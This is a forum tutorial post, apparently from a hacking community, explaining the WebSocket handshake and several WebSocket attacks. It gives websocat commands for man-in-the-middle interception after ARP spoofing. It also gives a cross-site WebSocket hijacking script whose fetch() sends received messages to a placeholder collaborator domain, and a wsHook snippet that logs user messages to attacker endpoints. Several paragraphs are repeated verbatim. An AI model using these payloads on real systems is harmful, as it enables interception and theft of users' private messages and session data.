Hello Turk Hack Team family.
Today, we will discuss the WebSocket protocol, widely used for real-time data transfer, and its vulnerabilities.
What is WebSocket ?
WebSocket is a technology that enables fast and efficient communication over the internet.
If you are someone who constantly shares things, chats, or tries to access live information on the internet, WebSocket allows you to perform these tasks much faster and smoother. For example, when tracking a sports match live, you can see every moment of the game instantly because WebSocket delivers the information to you immediately.
Alternatively, when chatting online with a friend, your messages can be exchanged almost instantly with minimal delay. All of this is made possible by WebSocket's persistent open connection. This technology not only offers fast communication but also an efficient way to communicate.
Unlike traditional methods, once a connection is established, WebSocket keeps this connection open, allowing for the instant exchange of new information. This provides great convenience, especially for those who want to track live events or use interactive applications.
In short, WebSocket is a technology that makes our internet experience faster, smoother, and more interactive. It enables real-time information exchange and easy communication with people anywhere in the world.
How are WebSocket connections established ?
The establishment of WebSocket connections is like opening a fast and continuous communication line between two devices on the internet.
Starting Point:
Everything begins when a web application wants to establish a WebSocket connection with the server. This is typically triggered by the user opening a web page.
Handshake Request:
The browser sends a special HTTP request to the server. This request indicates the intention to establish a WebSocket connection.
Example:
Everything begins when a web application wants to establish a WebSocket connection with the server. This is typically triggered by the user opening a web page.
Handshake Request:
The browser sends a special HTTP request to the server. This request indicates the intention to establish a WebSocket connection.
Example:
Kod:
GET /chat HTTP/1.1
Host: normal-website.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: rastgeleAnahtar
Sec-WebSocket-Version: 13Server Response:
If the server accepts the WebSocket connection, it sends a response to the browser. This response indicates that they will now use the WebSocket protocol instead of regular HTTP:
If the server accepts the WebSocket connection, it sends a response to the browser. This response indicates that they will now use the WebSocket protocol instead of regular HTTP:
Kod:
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: birTürDoğrulamaKoduHere, the 101 Switching Protocols code indicates that communication will now be conducted over WebSocket. Sec-WebSocket-Accept confirms that the server has validated the request and is ready for the connection.
Websocat and MITM
Websocat is used to send and receive data over the internet using the WebSocket protocol.
You can use it for various purposes such as setting up an online chat room or testing real-time functionalities of a web application.
For instance, you can use the following command to connect to an existing WebSocket protocol:
Websocat and MITM
Websocat is used to send and receive data over the internet using the WebSocket protocol.
You can use it for various purposes such as setting up an online chat room or testing real-time functionalities of a web application.
For instance, you can use the following command to connect to an existing WebSocket protocol:
Kod:
websocat --insecure wss://10.10.10.10:8000 -vAlternatively, you can create a WebSocket server with the following command.
Kod:
websocat -s 0.0.0.0:8000
If you detect any device connecting to the WebSocket network on your network (you can do this with tools like Wireshark, etc.), you can create attack vectors by intercepting with ARP spoofing and MITM techniques. For example, when the server tries to connect to the client, you can intercept with the following command.
Kod:
websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -vCross-site WebSocket hijacking (CSWSH)
In Cross-site WebSocket hijacking (CSWSH) attacks, an attacker seizes control of a user's WebSocket connection through a malicious website. This type of attack can occur when a user believes they are establishing a secure connection with an original application. In reality, the user ends up connected to a site under the attacker's control.
For instance, when a user visits a page on the attacker's website containing malicious JavaScript code, this code executes in the user's browser and redirects the WebSocket connection to the attacker's server. In this scenario, the user unknowingly connects to a server controlled by the attacker, which can be used to steal the user's information or engage in other malicious activities.
Here is a sample javascript code example for this scenario:
In Cross-site WebSocket hijacking (CSWSH) attacks, an attacker seizes control of a user's WebSocket connection through a malicious website. This type of attack can occur when a user believes they are establishing a secure connection with an original application. In reality, the user ends up connected to a site under the attacker's control.
For instance, when a user visits a page on the attacker's website containing malicious JavaScript code, this code executes in the user's browser and redirects the WebSocket connection to the attacker's server. In this scenario, the user unknowingly connects to a server controlled by the attacker, which can be used to steal the user's information or engage in other malicious activities.
Here is a sample javascript code example for this scenario:
JavaScript:
<script>
websocket = new WebSocket('wss://your-websocket-URL');
websocket.onopen = start;
websocket.onmessage = handleReply;
function start(event) {
websocket.send("READY"); // Saldırganın sunucusuna gönderilen mesaj
}
function handleReply(event) {
// Burada saldırgan, kullanıcıdan gelen bilgileri ele geçirebilir
fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
}
</script>In this scenario, the part websocket.send("READY") sends a signal to the attacker's server and initiates data exchange through the user's device. This puts the user's sensitive information at risk.
Cross-Origin and Different Subdomain with Cookie
In the Cross-Origin WebSocket hijacking (CSWSH) scenario, an attacker conducts the attack using a subdomain similar to, but not exactly the same as, the domain handling WebSocket communication.
In this type of attack, the attacker mimics the appearance of a trusted web application, redirecting users to their own malicious sites. This occurs especially when cookies are shared across different subdomains.
The attacker creates a webpage resembling the targeted original web application. Then, they embed a WebSocket connection communicating with the attacker's server into it. When a user visits this malicious page, the browser opens the WebSocket connection and sends user information to the server under the attacker's control. The attacker then seizes the user's sensitive information through this WebSocket connection. For example, the information a user sends through a messaging application is actually sent to the attacker's server and recorded by the attacker.
Cross-Origin and Different Subdomain with Cookie
In the Cross-Origin WebSocket hijacking (CSWSH) scenario, an attacker conducts the attack using a subdomain similar to, but not exactly the same as, the domain handling WebSocket communication.
In this type of attack, the attacker mimics the appearance of a trusted web application, redirecting users to their own malicious sites. This occurs especially when cookies are shared across different subdomains.
The attacker creates a webpage resembling the targeted original web application. Then, they embed a WebSocket connection communicating with the attacker's server into it. When a user visits this malicious page, the browser opens the WebSocket connection and sends user information to the server under the attacker's control. The attacker then seizes the user's sensitive information through this WebSocket connection. For example, the information a user sends through a messaging application is actually sent to the attacker's server and recorded by the attacker.
JavaScript:
<script src='wsHook.js'></script>
wsHook.before = function(data, url) {
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "client_msg?m="+data, true);
xhttp.send();
}
wsHook.after = function(messageEvent, url, wsObject) {
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "server_msg?m="+messageEvent.data, true);
xhttp.send();
return messageEvent;
}Topic Owner @Enistein WebSocket ve Popüler Saldırı Vektörleri
